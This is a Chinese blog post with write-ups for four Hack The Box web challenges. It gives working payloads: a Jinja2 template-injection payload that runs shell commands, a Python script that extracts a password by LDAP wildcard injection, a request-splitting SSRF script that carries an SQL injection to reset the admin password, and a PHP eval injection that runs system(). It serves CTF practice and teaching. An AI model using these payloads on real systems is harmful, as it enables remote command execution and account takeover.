<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  
  <meta name="author" content="sovo" />
  <meta name="description" content="" />
  
  
  <title>
    
      web 
      
      
      |
    
     小小做题家
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Oranges</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">web</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2022-12-29 17:49:01
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/LDAP/" title="LDAP">
                    #LDAP
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h3 id="Templated"><a href="#Templated" class="headerlink" title="Templated"></a><a target="_blank" rel="noopener" href="https://app.hackthebox.com/challenges/templated">Templated</a></h3><img src="/2022/11/01/web/image-20221101203438421.png" class="" title="image-20221101203438421">

<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs dts">什么都没有，但是已经提示是模板注入了，get提交一下<span class="hljs-punctuation">&#123;</span><span class="hljs-punctuation">&#123;</span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><br><br><span class="hljs-title class_">/</span><span class="hljs-punctuation">&#123;</span><span class="hljs-punctuation">&#123;</span><span class="hljs-number">2</span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<img src="/2022/11/01/web/image-20221101203554495.png" class="" title="image-20221101203554495">

<p>显然存在模板注入，找资料了</p>
<p><a target="_blank" rel="noopener" href="https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee">https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee</a></p>
<p><a target="_blank" rel="noopener" href="https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/">https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/</a></p>
<p><a target="_blank" rel="noopener" href="http://bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/">http://bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/">https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/</a></p>
<p>这里的难点是找到可利用的类了，由于版本的不同网上大多数[72]类型的，对应的类是不一样的，所以不能直接使用</p>
<p>上面贴了很多博客，这里不一一叙述了，自行学习。</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">request.application.__globals__.__builtins__.__import__</span>(<span class="hljs-name">&#x27;os&#x27;</span>).popen(<span class="hljs-name">&#x27;id&#x27;</span>).read()&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<img src="/2022/11/01/web/image-20221101204331330.png" class="" title="image-20221101204331330">

<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">request.application.__globals__.__builtins__.__import__</span>(<span class="hljs-name">&#x27;os&#x27;</span>).popen(<span class="hljs-name">&#x27;cat flag.txt&#x27;</span>).read()&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<img src="/2022/11/01/web/image-20221101204400213.png" class="" title="image-20221101204400213">

<h3 id="Phonebook"><a href="#Phonebook" class="headerlink" title="Phonebook"></a><a target="_blank" rel="noopener" href="https://app.hackthebox.com/challenges/phonebook">Phonebook</a></h3><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/r00tgrok/p/ldap_injection_and_prevention.html">https://www.cnblogs.com/r00tgrok/p/ldap_injection_and_prevention.html</a></p>
<img src="/2022/11/01/web/image-20221102205727322.png" class="" title="image-20221102205727322">

<p>通配符*登陆</p>
<img src="/2022/11/01/web/image-20221102205806706.png" class="" title="image-20221102205806706">

<p>经过测试Reese，*也可以登陆那么现在要找flag了，search搜不到，LDAP注入是无法类似SQL直接查数据的，但是，上述的博客中存在，多次测试</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs css"><span class="hljs-selector-tag">a</span>*<br>f*<br>f1*<br></code></pre></td></tr></table></figure>

<p>按照这个思路，我们猜测Reese的密码就是flag那么根据flag格式有密码为HTB{*}形式的猜测，进行测试发现这个密码确实能登陆那么下面就好办了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> string<br><br>header = &#123;<br>    <span class="hljs-string">&quot;User-Agent&quot;</span>: <span class="hljs-string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0&quot;</span><br>&#125;<br>url = <span class="hljs-string">&quot;http://178.62.87.44:32207/login&quot;</span><br><br><span class="hljs-comment"># 测试字符集</span><br>chars = string.ascii_letters<br>chars += <span class="hljs-string">&#x27;&#x27;</span>.join([<span class="hljs-string">&#x27;0&#x27;</span>, <span class="hljs-string">&#x27;1&#x27;</span>, <span class="hljs-string">&#x27;2&#x27;</span>, <span class="hljs-string">&#x27;3&#x27;</span>, <span class="hljs-string">&#x27;4&#x27;</span>, <span class="hljs-string">&#x27;5&#x27;</span>, <span class="hljs-string">&#x27;6&#x27;</span>, <span class="hljs-string">&#x27;7&#x27;</span>, <span class="hljs-string">&#x27;8&#x27;</span>, <span class="hljs-string">&#x27;9&#x27;</span>, <span class="hljs-string">&#x27;`&#x27;</span>, <span class="hljs-string">&#x27;~&#x27;</span>, <span class="hljs-string">&#x27;!&#x27;</span>, <span class="hljs-string">&#x27;@&#x27;</span>, <span class="hljs-string">&#x27;$&#x27;</span>, <span class="hljs-string">&#x27;%&#x27;</span>, <span class="hljs-string">&#x27;&amp;&#x27;</span>, <span class="hljs-string">&#x27;-&#x27;</span>, <span class="hljs-string">&#x27;_&#x27;</span>, <span class="hljs-string">&quot;&#x27;&quot;</span>])<br><br>counter = <span class="hljs-number">0</span><br>flag = <span class="hljs-string">&quot;HTB&#123;&quot;</span><br><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    <span class="hljs-comment"># 所有字符都测试了，说明找到了flag</span><br>    <span class="hljs-keyword">if</span> counter == <span class="hljs-built_in">len</span>(chars):<br>        <span class="hljs-built_in">print</span>(flag+<span class="hljs-string">&#x27;&#125;&#x27;</span>)<br>        <span class="hljs-keyword">break</span><br><br>    password = flag + chars[counter]+<span class="hljs-string">&#x27;*&#125;&#x27;</span><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Trying&quot;</span> + password)<br>    data = &#123;<span class="hljs-string">&quot;username&quot;</span> : <span class="hljs-string">&quot;Reese&quot;</span>, <span class="hljs-string">&quot;password&quot;</span> : password&#125;<br>    response = requests.post(url= url,headers=header,data=data)<br><br>    <span class="hljs-keyword">if</span> response.url != url+<span class="hljs-string">&quot;?message=Authentication%20failed&quot;</span>:<br>        flag += chars[counter]<br>        counter = <span class="hljs-number">0</span><br>    <span class="hljs-keyword">else</span>:<br>        counter += <span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>

<h3 id="Weather-App"><a href="#Weather-App" class="headerlink" title="Weather App"></a>Weather App</h3><p>首先下载附件，审计源码。</p>
<p><strong><img src="/2022/11/01/web/image-20221229123403100.png" class="" title="image-20221229123403100"></strong></p>
<p>可以看到在使用admin登陆时，会将flag返回</p>
<p>尝试登陆，密码不知道。</p>
<p>查看其它路由</p>
<img src="/2022/11/01/web/image-20221229123548852.png" class="" title="image-20221229123548852">

<p>发现，有注册功能，但是，这里仅接受来自本地的请求，查看其它位置有没有利用的地方。</p>
<p>返现对&#x2F;api&#x2F;weather的请求中存在http请求</p>
<img src="/2022/11/01/web/image-20221229123746859.png" class="" title="image-20221229123746859">

<p>这里需要激发额外的http请求</p>
<img src="/2022/11/01/web/image-20221229123922496.png" class="" title="image-20221229123922496">

<p>node8对http模块很容易<a target="_blank" rel="noopener" href="https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/">通过Request Splitting</a>受到<a target="_blank" rel="noopener" href="https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/">SSRF的</a>攻击。</p>
<p>这里找到了攻击入口，尝试构造payload</p>
<img src="/2022/11/01/web/image-20221229124221332.png" class="" title="image-20221229124221332">

<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">(<span class="hljs-string">&#x27;admin&#x27;</span>,<span class="hljs-string">&#x27;123&#x27;</span>) <span class="hljs-keyword">ON</span> <span class="hljs-keyword">CONFLICT</span>(username) <span class="hljs-keyword">DO</span> <span class="hljs-keyword">UPDATE</span> <span class="hljs-keyword">SET</span> <span class="hljs-keyword">password</span>=<span class="hljs-string">&#x27;admin&#x27;</span>;<span class="hljs-comment">--+&#x27;)</span><br></code></pre></td></tr></table></figure>

<p>所以构造如下</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-attribute">username</span>=admin&amp;password=1234&#x27;) ON CONFLICT(username) <span class="hljs-keyword">DO</span> UPDATE <span class="hljs-built_in">SET</span> password = <span class="hljs-string">&#x27;admin&#x27;</span>;--<br></code></pre></td></tr></table></figure>

<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">GET</span> <span class="hljs-string">/</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>127.0.0.1<br><br><span class="language-http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/register</span> <span class="hljs-meta">HTTP/1.1</span></span><br><span class="language-http"><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>127.0.0.1</span><br><span class="language-http"><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="language-http"><span class="hljs-attribute">Content-Length</span><span class="hljs-punctuation">: </span>29</span><br><span class="language-http"></span><br><span class="language-http"><span class="language-routeros"><span class="hljs-attribute">username</span>=admin&amp;password=1234&#x27;) ON CONFLICT(username) <span class="hljs-keyword">DO</span> UPDATE <span class="hljs-built_in">SET</span> password = <span class="hljs-string">&#x27;admin&#x27;</span>;--</span></span><br><span class="language-routeros"><span class="language-http"></span></span><br><span class="language-routeros"><span class="language-http"><span class="hljs-built_in">GET</span> / HTTP/1.1</span></span><br><span class="language-routeros"><span class="language-http">Host: 127.0.0.1</span></span><br></code></pre></td></tr></table></figure>

<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;http://167.172.55.94:30182&quot;</span><br><br>username = <span class="hljs-string">&#x27;admin&#x27;</span><br>password = <span class="hljs-string">&#x27;1234\&#x27;) ON CONFLICT(username) DO UPDATE SET password = \&#x27;admin\&#x27;;--&#x27;</span><br>PARSEusername = username.replace(<span class="hljs-string">&quot; &quot;</span>,<span class="hljs-string">&quot;\u0120&quot;</span>).replace(<span class="hljs-string">&quot;&#x27;&quot;</span>,<span class="hljs-string">&quot;%27&quot;</span>).replace(<span class="hljs-string">&#x27;&quot;&#x27;</span>,<span class="hljs-string">&quot;%22&quot;</span>)<br>PARSEpassword = password.replace(<span class="hljs-string">&quot; &quot;</span>,<span class="hljs-string">&quot;\u0120&quot;</span>).replace(<span class="hljs-string">&quot;&#x27;&quot;</span>,<span class="hljs-string">&quot;%27&quot;</span>).replace(<span class="hljs-string">&#x27;&quot;&#x27;</span>,<span class="hljs-string">&quot;%22&quot;</span>)<br>contentLength = <span class="hljs-built_in">len</span>(PARSEusername)+<span class="hljs-built_in">len</span>(PARSEpassword)+<span class="hljs-number">19</span><br>endpoint = <span class="hljs-string">&#x27;127.0.0.1/\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHOST:\u0120127.0.0.1\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u0120&#x27;</span> + <span class="hljs-built_in">str</span>(contentLength) + <span class="hljs-string">&#x27;\u010D\u010A\u010D\u010Ausername=&#x27;</span> + PARSEusername + <span class="hljs-string">&#x27;&amp;password=&#x27;</span> + PARSEpassword + <span class="hljs-string">&#x27;\u010D\u010A\u010D\u010AGET\u0120/?lol=&#x27;</span><br>r = requests.post(url + <span class="hljs-string">&#x27;/api/weather&#x27;</span>, json=&#123;<span class="hljs-string">&#x27;endpoint&#x27;</span>: endpoint, <span class="hljs-string">&#x27;city&#x27;</span>: <span class="hljs-string">&#x27;chengdu&#x27;</span>, <span class="hljs-string">&#x27;country&#x27;</span>: <span class="hljs-string">&#x27;CN&#x27;</span>&#125;)<br><span class="hljs-built_in">print</span>(r)<br></code></pre></td></tr></table></figure>

<h3 id="LoveTok"><a href="#LoveTok" class="headerlink" title="LoveTok"></a>LoveTok</h3><p>审计源码，找到调用链</p>
<img src="/2022/11/01/web/image-20221229173947869.png" class="" title="image-20221229173947869">

<img src="/2022/11/01/web/image-20221229174010675.png" class="" title="image-20221229174010675">

<img src="/2022/11/01/web/image-20221229174053042.png" class="" title="image-20221229174053042">

<img src="/2022/11/01/web/image-20221229174123918.png" class="" title="image-20221229174123918">

<p>由此，找到调用链</p>
<img src="/2022/11/01/web/image-20221229174216675.png" class="" title="image-20221229174216675">

<p>过滤处理</p>
<p>addslashes ( string <code>$str</code> ) : string</p>
<p>返回字符串，该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号（*’<em>）、双引号（</em>“<em>）、反斜线（\）与 NUL（</em><em><code>NULL</code></em>* 字符）。</p>
<p>绕过该函数</p>
<p><a target="_blank" rel="noopener" href="https://www.programmersought.com/article/30723400042/">https://www.programmersought.com/article/30723400042/</a></p>
<p>即</p>
<figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mel">?<span class="hljs-keyword">format</span>=$&#123;<span class="hljs-keyword">system</span>($_GET[<span class="hljs-number">1</span>])&#125;&amp;<span class="hljs-number">1</span>=<span class="hljs-keyword">ls</span>+/<br></code></pre></td></tr></table></figure>

<img src="/2022/11/01/web/image-20221229174757729.png" class="" title="image-20221229174757729">

<img src="/2022/11/01/web/image-20221229174827479.png" class="" title="image-20221229174827479">

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">?format=<span class="hljs-variable">$&#123;system($_GET[1])&#125;</span>&amp;1=<span class="hljs-built_in">cat</span>+/flagD1wvH<br></code></pre></td></tr></table></figure>

<p><strong>HTB{wh3n_l0v3_g3ts_eval3d_sh3lls_st4rt_p0pp1ng}</strong></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2022/10/11/%E7%BB%8F%E5%85%B8%E5%8A%A0%E5%AF%86%E7%AE%97%E6%B3%95%E7%9A%84%E5%AE%9E%E7%8E%B0%E4%B8%8E%E7%A0%B4%E8%A7%A3-%E5%87%AF%E6%92%92/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2022-12-29 17:49:01
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/LDAP/" title="LDAP">
                        #LDAP
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/2022/11/01/pwn/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#web"><span class="toc-text">web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Templated"><span class="toc-text">Templated</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Phonebook"><span class="toc-text">Phonebook</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Weather-App"><span class="toc-text">Weather App</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#LoveTok"><span class="toc-text">LoveTok</span></a></li></ol></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2023 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + web + '&url=' + http%3A%2F%2Fsovohelp.fit%2F2022%2F11%2F01%2Fweb%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://sovohelp.fit/2022/11/01/web/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
